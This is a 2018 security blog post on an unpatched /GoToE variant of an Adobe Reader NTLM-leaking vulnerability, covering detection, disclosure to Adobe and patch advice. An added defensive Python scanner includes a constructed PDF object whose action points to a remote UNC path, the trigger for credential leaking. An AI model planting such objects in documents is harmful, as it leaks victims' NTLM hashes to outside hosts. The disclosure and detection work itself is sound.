Tuesday, November 13, 2018

The case of the unpatched variant of the PDF NTLM leaking vulnerability CVE-2018-4993

In April or May 2018, Check Point released a blog post detailing an NTLM leaking vulnerability in Adobe Reader & Foxit Reader. Later, Adobe released a security advisory stating that the vulnerability was fixed as of Acrobat Reader DC 2018.011.20040. However, we found that only one variant of this vulnerability was successfully patched by Adobe; the other variant was not actually addressed.

The story
Recently, during testing of our EdgeLogic engine (the backend engine of our free exploit detection service edgespot.io), we found at least two samples producing interesting detection results.

When we put these two samples into our engine, they were detected as "MALICIOUS - POTENTIAL ZERO-DAY ATTACK (NTLM leaking)". They look like the following:

[Update on Nov. 14]
Users of edgespot.io will find that the Detection Details of this particular threat have changed to "exploit CVE-2018-15979 (NTLM leaking), previously zero-day (modified on 20181114)", starting today. This is because today we modified the description of the threat to reflect that the patch is available and a CVE ID has been assigned to this threat.

Could it be a false detection? Of course it could. Given that attack techniques are always evolving, exploit detection is not an easy task.

In order to confirm this test result, we fired up our VM, updated it to the latest Adobe Reader version, and tested those two samples manually. We observed that those two samples were still sending NTLM traffic out.

After further research, we confirmed that those two samples are actually exploiting the same or a similar vulnerability to CVE-2018-4993, which was discussed in the Check Point blog post we mentioned earlier. As the Check Point blog stated:
/S entry: Describes the type of action to be performed. The GoTo action changes the view to a specified destination within the document. The action types GoToR (Go To Remote) and GoToE (Go To Embedded), both vulnerable, jump to destinations in another PDF file.
When we examined the content of the two samples, we found that the key parts of the two PDFs are:

They both use the “/GoToE” keyword to trigger the NTLM leaking. We later confirmed that while the “/GoToR” method was patched by Adobe, the “/GoToE” method was not.

We conclude this is a failed patch of CVE-2018-4993 rather than a new vulnerability, because the Check Point blog mentioned this variant when disclosing CVE-2018-4993. Please note we do not know whether both variants (“/GoToR” and “/GoToE”) were reported to Adobe by Check Point, but clearly, one variant was not fixed.
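As an added example (not the EdgeLogic engine and not code from the page), a small defender-side scanner for the pattern shared by both variants: a /GoToR or /GoToE action whose file specification points at a UNC path or URL, which is what makes the reader reach out to another host. The two sample objects are constructed for the demonstration and use an RFC 5737 test address; the keyword names, the /F and /UF file-specification keys, and the /T target dictionary are from the PDF specification.

```python
import re

_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}

def pdf_unescape(s: bytes) -> bytes:
    """Decode PDF literal-string escapes (doubled backslash, parens, octal, n/r/t/b/f)."""
    def one(m):
        e = m.group(1)
        return bytes([int(e, 8) & 0xFF]) if e[:1] in b"01234567" else _ESC.get(e, e)
    return re.sub(rb"\\([0-7]{1,3}|.)", one, s, flags=re.DOTALL)

def _enclosing_dict(data: bytes, pos: int) -> bytes:
    """Return the innermost << ... >> dictionary that contains offset pos."""
    toks = [(m.start(), m.group()) for m in re.finditer(rb"<<|>>", data)]
    depth, start = 0, 0
    for off, tok in reversed([t for t in toks if t[0] < pos]):  # back to the unmatched '<<'
        depth += 1 if tok == b">>" else -1
        if depth < 0:
            start = off
            break
    depth = 0
    for off, tok in [t for t in toks if t[0] >= start]:         # forward to its matching '>>'
        depth += 1 if tok == b"<<" else -1
        if depth == 0:
            return data[start:off + 2]
    return data[start:]

def is_remote_filespec(path: bytes) -> bool:
    """True for a UNC path (\\\\host\\share, //host/share) or a URL: opening it reaches another host."""
    p = path.lower()
    return p.startswith((b"\\\\", b"//")) or re.match(rb"[a-z][a-z0-9+.-]*://", p) is not None

def scan_pdf_bytes(data: bytes) -> list:
    """One finding per /GoToR or /GoToE action whose file specification points off-host.
    Assumes uncompressed objects: inflate object streams first for real-world files."""
    findings = []
    for m in re.finditer(rb"/S\s*/(GoToR|GoToE)\b", data):
        action = _enclosing_dict(data, m.start())
        fs = re.search(rb"/(?:F|UF)\s*\(((?:\\.|[^\\)])*)\)", action, re.DOTALL)
        target = pdf_unescape(fs.group(1)) if fs else b""       # no /F: GoToE into an embedded file (/T)
        if target and is_remote_filespec(target):
            findings.append({"action": m.group(1).decode(), "target": target.decode("latin-1")})
    return findings

# Constructed sample objects (not the page's samples): a link whose /GoToE action names a
# UNC file spec on an RFC 5737 test address, and a benign /GoToE into an embedded file.
SAMPLE_REMOTE = (b"1 0 obj\n<< /Type /Annot /Subtype /Link /Rect [0 0 100 100]\n"
                 b"   /A << /S /GoToE /F (\\\\\\\\192.0.2.10\\\\share\\\\doc.pdf) /D [0 /Fit] >> >>\nendobj\n")
SAMPLE_BENIGN = b"2 0 obj\n<< /A << /S /GoToE /T << /R /C /N (Attached.pdf) >> /D [0 /Fit] >> >>\nendobj\n"
```

Both action types are flagged, since the page shows that a fix for one variant says nothing about the other; in real files the action dictionaries often sit inside compressed object streams, so run the scanner on the decompressed objects produced by a PDF parsing library.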

Nevertheless, from the point of view of protecting users, it is a big deal for the following reasons:
  1. This is a zero-day (no patch) exploit.
  2. The details of the zero-day exploit have been public for more than 5 months.
  3. Regarding the two samples on VT (there are likely more, although we found these two by chance): we do not know why they were submitted to VT or who submitted them, and there is a possibility that bad guys realized this variant was not patched and were testing their zero-day exploits.
We realized this is an important finding, so we reported it to Adobe as fast as we could, regardless of our busy agenda of developing the system & website for edgespot.io. We are happy that they took this issue up quickly and patched it fast. Here is the disclosure timeline:

2018.11.04 finding reported to Adobe
2018.11.05 Adobe confirmed the finding & notified us they plan to release a patch on Nov. 13
2018.11.13 patch released & blog post released

We ask users to patch their Adobe Reader as soon as possible; please follow Adobe's security advisory released today.

This finding proves the power of our EdgeLogic engine, which is behind https://edgespot.io: it has an outstanding capability for identifying unknown & zero-day exploits! By offering it as a free service to everyone, we hope to make the internet a safer place. So, when you encounter suspicious samples, whether they are email files (eml, msg), Office files (doc, xls, ppt), PDFs, or even .zip archives, try edgespot.io and see what it detects!

[Update on Nov. 14]
We have detected yet another sample exploiting this zero-day.

Unlike the previous two, which used internal IP addresses, this one used an external IP address, which looks more like a real in-the-wild attack. We're sharing this info to help the security community with threat intelligence.
